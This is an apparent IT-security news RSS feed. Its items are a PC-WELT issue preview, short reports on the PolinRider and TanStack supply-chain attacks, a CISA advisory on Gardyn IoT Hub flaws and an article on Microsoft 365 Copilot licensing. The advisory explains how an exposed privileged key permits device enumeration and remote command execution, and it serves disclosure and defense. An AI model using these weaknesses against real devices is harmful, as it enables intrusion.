href="https://github.com/alisalive"><em>GitHub</em></a><em>.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=40f5e9450703" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/certified-ad-red-team-specialist-ad-rts-full-exam-write-up-40f5e9450703">Certified AD Red Team Specialist (AD-RTS): Full Exam Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PC-WELT 8/2026 jetzt am Kiosk: Registry-Tricks mit Sofortwirkung]]></title>
<description><![CDATA[Registry-Tricks mit Sofortwirkung: Windows bietet mehrere Hundert Einstellungen, die man in der Registry auch direkt anpassen kann. Das lässt sich für die schnelle Windows-Konfiguration mit wenigen Mausklicks nutzen. Auf der Heft-DVD finden Sie Tools, die sich dafür eignen.



Windows mit persönl...]]></description>
<link>https://tsecurity.de/de/3643018/it-nachrichten/pc-welt-82026-jetzt-am-kiosk-registry-tricks-mit-sofortwirkung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643018/it-nachrichten/pc-welt-82026-jetzt-am-kiosk-registry-tricks-mit-sofortwirkung/</guid>
<pubDate>Fri, 03 Jul 2026 10:33:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><strong>Registry-Tricks mit Sofortwirkung: </strong>Windows bietet mehrere Hundert Einstellungen, die man in der Registry auch direkt anpassen kann. Das lässt sich für die schnelle Windows-Konfiguration mit wenigen Mausklicks nutzen. Auf der Heft-DVD finden Sie Tools, die sich dafür eignen.</p>



<p><strong>Windows mit persönlicher Note: </strong>Das gleiche Windows wie alle anderen zu haben ist langweilig. Mit wenigen Handgriffen können Sie die Oberfläche an Ihre persönlichen Vorstellungen anpassen.</p>



<p><strong>Achtung: Aktuelle Phishing-Fallen: </strong>Besonders Windows-Nutzer geraten zunehmend ins Visier von Phishing-Attacken. Diese laufen nicht nur per Links in E-Mails, sondern auch über QR-Codes, Clouddienste und gefälschte Sicherheitswarnungen im Browser ab. Wir zeigen die sieben aktuell gefährlichsten Phishing-Fallen und wie Sie sich davor schützen.</p>



<p>Das und vieles mehr finden Sie in der neuen PC-WELT 8/2026. Jetzt am Kiosk und im PC-WELT-Shop.</p>



<p><strong>Eine Auswahl der Themen in der neuen PC-WELT 8/2026:</strong></p>



<ul class="wp-block-list">
<li><strong>Registry-Tricks.</strong> Die direkte Konfiguration über die Registry ermöglicht schnelle Anpassungen des Systems</li>



<li><strong>Windows nach Maß.</strong> Startmenü, Desktop, Taskleiste: So bauen Sie das System individuell nach Ihren Wünschen um</li>



<li><strong>Vorsicht vor neuen Phishing-Fallen!</strong> Betrügerische Windows-Meldungen: Auf diese Warnsignale müssen Sie jetzt achten</li>



<li><strong>Was Ihr WLAN bremst.</strong> Verborgene Geräte, falsche Einstellungen: Wie Sie versteckte Hürden im Heimnetz beseitigen</li>



<li><strong>Windows-Explorer-Tricks.</strong> So wird der Dateimanager zum Profi-Tool! Extra-Funktionen aktivieren, Kontextmenü anpassen …</li>



<li><strong>Alles überall finden.</strong> Speicherort oder Name vergessen? Mit diesen Tools und der KI finden Sie trotzdem jede Datei</li>



<li><strong>Mail mit Rückschein.</strong> Tipps für Outlook, Gmail, GMX: So wissen Sie, ob Ihre Nachrichten auch zugestellt werden</li>



<li><strong>Günstige Notebooks.</strong> Der Artikel zeigt, worauf Sie bei Laptops der 600-Euro-Klasse achten sollten</li>



<li><strong>Refurbished-PCs und -Notebooks.</strong> Günstige, leistungsstarke Rechner aus zweiter Hand</li>



<li><strong>Daten optimal absichern.</strong> Machen Sie Ihr System mit Bitlocker-Verschlüsselung &amp; Ransomware-Schutz zum digitalen Tresor</li>



<li><strong>Dateien retten bei SSDs.</strong> Versehentlich gelöschte Dateien sind selbst auf SSDs nicht automatisch verloren – vorausgesetzt, Sie handeln schnell</li>



<li><strong>Gmail im Griff.</strong> Mit diesen Tipps erleichtern Sie sich den Umgang mit der elektronischen Post</li>



<li><strong>UHD-Display richtig skalieren.</strong> Die richtige Darstellung für Schriften, App-Symbole und Icons</li>



<li><strong>Android 17.</strong> Das bringt das Update</li>



<li>…</li>
</ul>



<p><strong>Das lesen Sie nur im Plus-Teil der neuen PC-WELT 8/2026 –</strong> Windows 11 Pannenhilfe  – Alles retten &amp; reparieren: Notfall-Tipps für System und Dateien</p>



<ul class="wp-block-list">
<li><strong>Die beste Hilfe bei Windows-Problemen.</strong> Nicht immer funktioniert alles, wie es soll. Windows bietet hier integrierte Hilfe-, Diagnose- und Reparaturfunktionen.</li>



<li><strong>Windows-Nervereien abstellen.</strong> Bei Windows läuft nicht immer alles rund. Mit diesen Tipps und Tools lässt sich einiges im System verbessern.</li>



<li><strong>Secure-Boot-Probleme lösen.</strong> Damit Secure Boot sicherer wird, sind neue Zertifikate notwendig. Prüfen Sie den Update-Stand Ihres PCs.</li>



<li><strong>Windows-Upgrade: Jede Blockade lösen.</strong> Beim Umstieg von Windows 10 auf 11 hakt es immer wieder. Der Artikel zeigt, wie Sie die Blockaden beseitigen.</li>



<li><strong>Daten perfekt sichern und synchronisieren.</strong> Regelmäßige Backups verhindern, dass wichtige Daten nach einem Crash oder Virenangriff verloren gehen.</li>



<li><strong>Immer das richtige Programm starten.</strong> Ob PDF, Foto oder Musik – Windows öffnet viele Dateien mit dem falschen Programm. Das lässt sich leicht ändern.</li>
</ul>



<p><strong>Diese Programme finden Sie auf der Heft-DVD:</strong></p>



<ul class="wp-block-list">
<li><strong>Ascomp Files Suite.</strong> Dateiverwaltung</li>



<li><strong>Ashampoo Photo Commander 17.</strong> Fotos organisieren, bearbeiten und zeigen</li>



<li><strong>Audials TV Recorder 2026.</strong> Fernsehprogramme ansehen und aufzeichnen</li>



<li><strong>Lopesoft File Menu Tools.</strong> Kontextmenü anpassen</li>



<li><strong>M+T Spielkarten Drucken.</strong> Vorlagen für Spielkarten</li>



<li><strong>Wisecleaner Wise Data Recovery Pro.</strong> Daten wiederherstellen</li>



<li><strong>…</strong></li>
</ul>



<p><strong>PC-WELT 8/2026 gibt es in drei Varianten:</strong></p>



<ul class="wp-block-list">
<li>als Plus-Ausgabe mit Extra-Heft und einer Zusatz-Doppel-DVD für 8,99 Euro</li>



<li>als DVD-Ausgabe für 6,99 Euro und</li>



<li>als reines Magazin ohne Datenträger für 4,99 Euro</li>
</ul>



<p>Sie können die Plus-Ausgabe auch <a href="https://shop.pcwelt.de/pcwelt-plus-magazin-hefte-einzel-ausgaben.htm?websale8=idg&amp;ci=2-5278" target="_blank" rel="noreferrer noopener">direkt im PC-WELT-Shop bestellen</a> – als gedruckte Ausgabe oder für 3,99 Euro als ePaper. Hier finden Sie die <a href="https://shop.pcwelt.de/pcwelt-plus-abo.htm?websale8=idg&amp;ci=1-5278" target="_blank" rel="noreferrer noopener">Jahres-Abo-Varianten PC-WELT Plus</a>.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[North Korea-Linked PolinRider Campaign Hits 108 Open Source Packages and Extensions]]></title>
<description><![CDATA[The North Korea-linked PolinRider supply chain campaign is rapidly expanding its reach across developer ecosystems. Originally targeting the npm registry, threat actors associated with the Contagious Interview and Famous Chollima activity clusters have now infected 108 unique open-source projects...]]></description>
<link>https://tsecurity.de/de/3642854/it-security-nachrichten/north-korea-linked-polinrider-campaign-hits-108-open-source-packages-and-extensions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642854/it-security-nachrichten/north-korea-linked-polinrider-campaign-hits-108-open-source-packages-and-extensions/</guid>
<pubDate>Fri, 03 Jul 2026 08:37:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The North Korea-linked PolinRider supply chain campaign is rapidly expanding its reach across developer ecosystems. Originally targeting the npm registry, threat actors associated with the Contagious Interview and Famous Chollima activity clusters have now infected 108 unique open-source projects. Security researchers recently identified 162 malicious release artifacts, discovering compromise traces in 80 Go modules, 10 […]</p>
<p>The post <a href="https://cyberpress.org/polinrider-supply-chain-attack/">North Korea-Linked PolinRider Campaign Hits 108 Open Source Packages and Extensions</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gardyn IoT Hub]]></title>
<description><![CDATA[View CSAF
Summary
Successful exploitation of these vulnerabilities could allow unauthenticated users to access and control IoT Hub managed devices.
The following versions of Gardyn IoT Hub are affected:

Home Firmware
Studio Firmware
Cloud API]]></description>
<link>https://tsecurity.de/de/3641715/it-security-nachrichten/gardyn-iot-hub/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641715/it-security-nachrichten/gardyn-iot-hub/</guid>
<pubDate>Thu, 02 Jul 2026 18:25:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-183-03.json"><strong>View CSAF</strong></a></p>
<h2>Summary</h2>
<p><strong>Successful exploitation of these vulnerabilities could allow unauthenticated users to access and control IoT Hub managed devices.</strong></p>
<p>The following versions of Gardyn IoT Hub are affected:</p>
<ul>
<li>Home Firmware</li>
<li>Studio Firmware</li>
<li>Cloud API &lt;2.12.2026 (CVE-2026-13768, CVE-2026-55726, CVE-2026-54477)</li>
</ul>
<div class="csaf-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS</th>
<th role="columnheader">Vendor</th>
<th role="columnheader">Equipment</th>
<th role="columnheader">Vulnerabilities</th>
</tr>
</thead>
<tbody>
<tr>
<td>v3 10</td>
<td>Gardyn</td>
<td>Gardyn IoT Hub</td>
<td>Use of Hard-coded Credentials, Exposure of Sensitive System Information to an Unauthorized Control Sphere, Improper Neutralization of HTTP Headers for Scripting Syntax</td>
</tr>
</tbody>
</table>
</div>
<h3>Background</h3>
<ul>
<li><strong>Critical Infrastructure Sectors: </strong>Food and Agriculture</li>
<li><strong>Countries/Areas Deployed: </strong>United States</li>
<li><strong>Company Headquarters Location: </strong>United States</li>
</ul>
<hr>
<h2>Vulnerabilities</h2>
<div class="csaf-accordion">
<p><a class="csaf-accordion-toggle-all" href="https://www.cisa.gov/#">Expand All +</a></p>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-13768</a></h3>
<div class="csaf-accordion-content">
<p>Gardyn devices expose a privileged iothubowner key. Access to this key will allow a malicious user to invoke an IoTHub Registry Manager function which returns connection information for all Gardyn Home Kit and Studio devices. Access to this key also allows a malicious user to execute arbitrary commands on a specific connected device and may allow the malicious user to pivot to other devices on the user's network.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-13768">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Gardyn IoT Hub</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Gardyn</div>
<div class="ics-version"><strong>Product Version:</strong><br>Gardyn Home Firmware: &lt;master.627, Gardyn Studio Firmware: &lt;master.627, Gardyn Cloud API: &lt;2.12.2026</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Gardyn states that IoT Hub deployed infrastructure has been updated to fix the listed vulnerabilities.</p>
<p><strong>Mitigation</strong><br>Gardyn requests that users ensure their devices have Internet connectivity in order to automatically download needed firmware updates. Unconnected devices will automatically update when configured with a working Internet connection. Gardyn also recommends that users update their mobile application to the most recent version. The current versions of the Gardyn App and the Gardyn Home firmware can be checked in the Gardyn App.</p>
<p><strong>Mitigation</strong><br>Further information on Gardyn security can be found here: https://mygardyn.com/security/<br><a href="https://mygardyn.com/security/">https://mygardyn.com/security/</a></p>
<p><strong>Mitigation</strong><br>Further customer support can be obtained from Gardyn at: support@mygardyn.com<br><a href="mailto:support@mygardyn.com">mailto:support@mygardyn.com</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/798.html">CWE-798 Use of Hard-coded Credentials</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>10</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L</a></td>
</tr>
<tr>
<td>4.0</td>
<td>9.5</td>
<td>CRITICAL</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L">CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:L/SC:H/SI:H/SA:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-55726</a></h3>
<div class="csaf-accordion-content">
<p>The Azure Blob Storage container used for Gardyn device logs is publicly listable without authentication. A malicious user would be able to access any device log file available in the blob storage container.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-55726">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Gardyn IoT Hub</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Gardyn</div>
<div class="ics-version"><strong>Product Version:</strong><br>Gardyn Home Firmware: &lt;master.627, Gardyn Studio Firmware: &lt;master.627, Gardyn Cloud API: &lt;2.12.2026</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Gardyn states that IoT Hub deployed infrastructure has been updated to fix the listed vulnerabilities.</p>
<p><strong>Mitigation</strong><br>Gardyn requests that users ensure their devices have Internet connectivity in order to automatically download needed firmware updates. Unconnected devices will automatically update when configured with a working Internet connection. Gardyn also recommends that users update their mobile application to the most recent version. The current versions of the Gardyn App and the Gardyn Home firmware can be checked in the Gardyn App.</p>
<p><strong>Mitigation</strong><br>Further information on Gardyn security can be found here: https://mygardyn.com/security/<br><a href="https://mygardyn.com/security/">https://mygardyn.com/security/</a></p>
<p><strong>Mitigation</strong><br>Further customer support can be obtained from Gardyn at: support@mygardyn.com<br><a href="mailto:support@mygardyn.com">mailto:support@mygardyn.com</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/497.html">CWE-497 Exposure of Sensitive System Information to an Unauthorized Control Sphere</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>6.9</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-54477</a></h3>
<div class="csaf-accordion-content">
<p>The admin panel lacks standard security headers, enabling clickjacking and cross-site scripting attacks.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-54477">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Gardyn IoT Hub</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Gardyn</div>
<div class="ics-version"><strong>Product Version:</strong><br>Gardyn Home Firmware: &lt;master.627, Gardyn Studio Firmware: &lt;master.627, Gardyn Cloud API: &lt;2.12.2026</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Gardyn states that IoT Hub deployed infrastructure has been updated to fix the listed vulnerabilities.</p>
<p><strong>Mitigation</strong><br>Gardyn requests that users ensure their devices have Internet connectivity in order to automatically download needed firmware updates. Unconnected devices will automatically update when configured with a working Internet connection. Gardyn also recommends that users update their mobile application to the most recent version. The current versions of the Gardyn App and the Gardyn Home firmware can be checked in the Gardyn App.</p>
<p><strong>Mitigation</strong><br>Further information on Gardyn security can be found here: https://mygardyn.com/security/<br><a href="https://mygardyn.com/security/">https://mygardyn.com/security/</a></p>
<p><strong>Mitigation</strong><br>Further customer support can be obtained from Gardyn at: support@mygardyn.com<br><a href="mailto:support@mygardyn.com">mailto:support@mygardyn.com</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/644.html">CWE-644 Improper Neutralization of HTTP Headers for Scripting Syntax</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.4</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N</a></td>
</tr>
<tr>
<td>4.0</td>
<td>5.1</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N">CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<hr>
<h2>Acknowledgments</h2>
<ul>
<li>Michael Groberman reported these vulnerabilities to CISA</li>
</ul>
<hr>
<h2>Legal Notice and Terms of Use</h2>
<p>This product is provided subject to this Notification (https://www.cisa.gov/notification) and this Privacy &amp; Use policy (https://www.cisa.gov/privacy-policy).</p>
<hr>
<h2>Recommended Practices</h2>
<p>CISA recommends users take defensive measures to minimize the risk of exploitation of these vulnerabilities.</p>
<p>Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the Internet.</p>
<p>Locate control system networks and remote devices behind firewalls and isolating them from business networks.</p>
<p>When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.</p>
<p>CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.</p>
<p>CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.</p>
<p>CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.</p>
<p>Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.</p>
<p>Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.</p>
<p>No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.</p>
<hr>
<h2>Revision History</h2>
<ul>
<li><strong>Initial Release Date: </strong>2026-07-02</li>
</ul>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Date</th>
<th role="columnheader">Revision</th>
<th role="columnheader">Summary</th>
</tr>
</thead>
<tbody>
<tr>
<td>2026-07-02</td>
<td>1</td>
<td>Initial Publication</td>
</tr>
</tbody>
</table>
<hr>
<h2>Legal Notice and Terms of Use</h2>]]></content:encoded>
</item>
<item>
<title><![CDATA[TanStack-Angriff nutzte vertrauens­würdige Pipelines als Waffe]]></title>
<description><![CDATA[Manipulierte TanStack-Pakete gelangten über einen missbrauchten OIDC-Token in die npm-Registry. Der eingebettete Schadcode sammelte beim Installieren Cloud-Zugänge, GitHub- und npm-Tokens sowie SSH-Schlüssel. Seit dem TanStack-Angriff hat die Mini-Shai-Hulud-Welle Microsoft, Red Hat und zahlreich...]]></description>
<link>https://tsecurity.de/de/3641498/it-security-nachrichten/tanstack-angriff-nutzte-vertrauenswuerdige-pipelines-als-waffe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641498/it-security-nachrichten/tanstack-angriff-nutzte-vertrauenswuerdige-pipelines-als-waffe/</guid>
<pubDate>Thu, 02 Jul 2026 16:38:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Manipulierte TanStack-Pakete gelangten über einen missbrauchten OIDC-Token in die npm-Registry. Der eingebettete Schadcode sammelte beim Installieren Cloud-Zugänge, GitHub- und npm-Tokens sowie SSH-Schlüssel. Seit dem TanStack-Angriff hat die Mini-Shai-Hulud-Welle Microsoft, Red Hat und zahlreiche weitere Organisationen getroffen. Hier analysieren wir den technischen Ursprung dieser Angriffsserie.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft 365 Copilot: Office meets genAI and agents]]></title>
<description><![CDATA[Initially launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid a...]]></description>
<link>https://tsecurity.de/de/3640909/it-nachrichten/microsoft-365-copilot-office-meets-genai-and-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640909/it-nachrichten/microsoft-365-copilot-office-meets-genai-and-agents/</guid>
<pubDate>Thu, 02 Jul 2026 13:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Initially launched in November 2023, Microsoft 365 Copilot brings a range of generative AI (genAI) features to Microsoft Office productivity apps, such as Word, Outlook, Teams, and Excel. With capabilities ranging from quick meeting summaries to in-depth data analysis, it’s available via a paid add-on license for <a href="https://www.computerworld.com/article/1691110/microsoft-365-explained.html">Microsoft 365</a> enterprise and small-business customers.</p>



<p>Initially hampered by <a href="https://www.computerworld.com/article/2513395/copilot-for-microsoft-365-review-hands-on-deep-dive.html">underwhelming capabilities</a> and a hefty price tag for businesses of all sizes, M365 Copilot has slowly gained traction in business as its abilities have increased and the integrations between Copilot and various M365 apps and services have improved. With numerous feature rollouts over the past three years, Microsoft has gradually repositioned M365 Copilot from a simple chatbot to a collection of autonomous agents that can carry out tasks across the M365 ecosystem.</p>



<p>The company has also goosed adoption by introducing a <a href="https://www.computerworld.com/article/4093224/microsoft-drops-m365-copilot-price-for-smbs-upgrades-free-copilot-chat.html">more affordable pricing tier for small businesses</a> and (temporarily, as it turns out) allowing commercial users with a standard M365 license to <a href="https://www.computerworld.com/article/4058429/copilot-chat-comes-to-m365-apps-for-no-extra-cost.html">use Copilot in the Office apps</a>, even without the add-on M365 Copilot license.</p>



<h3 class="wp-block-heading">Microsoft 365 Copilot pricing: 2026 tiers</h3>



<figure class="wp-block-table"><div class="overflow-table-wrapper"><table><tbody><tr><td><strong>Tier</strong></td><td><strong>Monthly cost (paid annually)</strong></td><td><strong>Availability</strong></td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing/enterprise" target="_blank" rel="noreferrer noopener">M365 Copilot</a></td><td>$30 / user</td><td>For organizations with more than 300 seats; required for in-app Copilot integration in organizations with more than 2,000 seats</td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-365-copilot/pricing" target="_blank" rel="noreferrer noopener">M365 Copilot Business</a></td><td>$21 / user</td><td>For organizations with 10 – 300 seats</td></tr><tr><td><a href="https://www.microsoft.com/en-us/microsoft-agent-365#plans-and-pricing" target="_blank" rel="noreferrer noopener">Agent 365</a> (add-on management layer)</td><td>$15 / user</td><td>Available as standalone subscription or included in the new M365 E7 Frontier Suite</td></tr></tbody></table> </div></figure>



<h2 class="wp-block-heading">Microsoft 365 Copilot today</h2>



<p>In this way, Microsoft 365 Copilot has moved from genAI curiosity to a key part of many enterprises’ workflows. In January 2026, Microsoft said it had <a href="https://www.computerworld.com/article/4124591/microsoft-touts-m365-copilot-momentum-claims-15m-paid-users.html">15 million paid M365 Copilot seats</a>, a figure the company <a href="https://techcrunch.com/2026/04/29/microsoft-says-it-has-over-20m-paid-copilot-users-and-they-really-are-using-it/" target="_blank" rel="noreferrer noopener">raised to 20 million</a> in April.</p>



<p>However, its momentum now faces a challenge as <a href="https://www.computerworld.com/article/4150022/microsoft-backtracks-on-copilot-chat-access-in-m365-apps.html">Microsoft limits access to Copilot Chat</a>, a freemium version of the paid M365 Copilot, for its largest enterprise customers. </p>



<p>Specifically, for commercial customers with more than 2,000 seats, Microsoft has removed in-app Copilot Chat access from Word, Excel, and PowerPoint for users without a Microsoft 365 Copilot license. To maintain that integration, large organizations must now pay for the full $30/user/month M365 Copilot license. The M365 Copilot license includes what Microsoft calls priority access to Copilot capabilities, which provides “faster response times and more consistent availability compared to standard access,” according the the company. </p>



<p>Smaller firms (less than 2,000 seats) that have a Microsoft 365 license but not the add-on M365 Copilot license will maintain standard access to Copilot from within the Office apps. <a href="https://support.microsoft.com/en-gb/topic/standard-versus-priority-access-to-features-in-microsoft-365-copilot-chat-12c8d9f8-db32-4f99-8ebe-d8d85879137f">Microsoft warns</a> that standard users may experience longer response times and temporary feature limitations as the service shifts resources to its higher-tier customers during peak hours.</p>



<p>When signed in to the <a href="https://m365.cloud.microsoft/" target="_blank" rel="noreferrer noopener">Copilot Chat hub</a>, users can see which version of Copilot they have by looking for one of the following labels at the bottom of the left sidebar:</p>



<ul class="wp-block-list">
<li><strong>Copilot Chat (Basic)</strong> means the user doesn’t have an M365 Copilot license and can’t use Copilot in the Office apps. They can use the standalone Copilot Chat app with standard access.</li>



<li><strong>M365 Copilot (Basic)</strong> means the user doesn’t have an M365 Copilot license but does have standard access to Copilot in the Office apps.</li>



<li><strong>M365 Copilot (Premium)</strong> means the user has an M365 Copilot license and has priority access to Copilot in the Office apps.</li>
</ul>



<p>Users with paid M365 Copilot licenses also get advanced features including the ability to pull in data from across the M365 environment (documents, meetings, emails, chats, etc.), extensive use of agents including “advanced” agents like Researcher and Analyst, and the ability to create custom agents. See Microsoft’s “<a href="https://support.microsoft.com/en-us/microsoft-365-copilot/how-copilot-chat-works-with-and-without-a-microsoft-365-copilot-license" target="_blank" rel="noreferrer noopener">How Copilot Chat works with and without a Microsoft 365 Copilot license</a>” page for details.</p>



<aside class="sidebar">
<h3><strong>What’s new with Microsoft 365 Copilot</strong></h3>
&gt;
<li> <strong>Licensing shift:</strong> Large enterprises (more than 2,000 seats) cannot access Copilot directly in Office apps without the M365 Copilot license.</li>
<li><strong>Multimodel access:</strong> M365 Copilot now supports non-OpenAI models like Anthropic’s Claude 4, allowing users to choose the best logic for specific tasks.</li>
<li><strong>Agentic pivot:</strong> The focus shifts from simple chat to autonomous agents that execute multi-step workflows across the M365 ecosystem.</li>

</aside>




<h2 class="wp-block-heading">What other Copilots does Microsoft offer?</h2>



<p>It’s worth noting that Microsoft uses the term “Copilot” for a wide variety of genAI tools and functions. Individual users with M365 Personal, Family, and Premium subscriptions <a href="https://www.computerworld.com/article/3806855/copilot-ai-microsoft-365.html">can use Copilot in Office apps</a>, but with fewer features and privileges than business users get with a Microsoft 365 Copilot license. There’s also a <a href="https://www.computerworld.com/article/1611598/microsoft-copilot-tips-how-to-use-copilot-right.html">free consumer version of Copilot</a> with very limited functionality. </p>



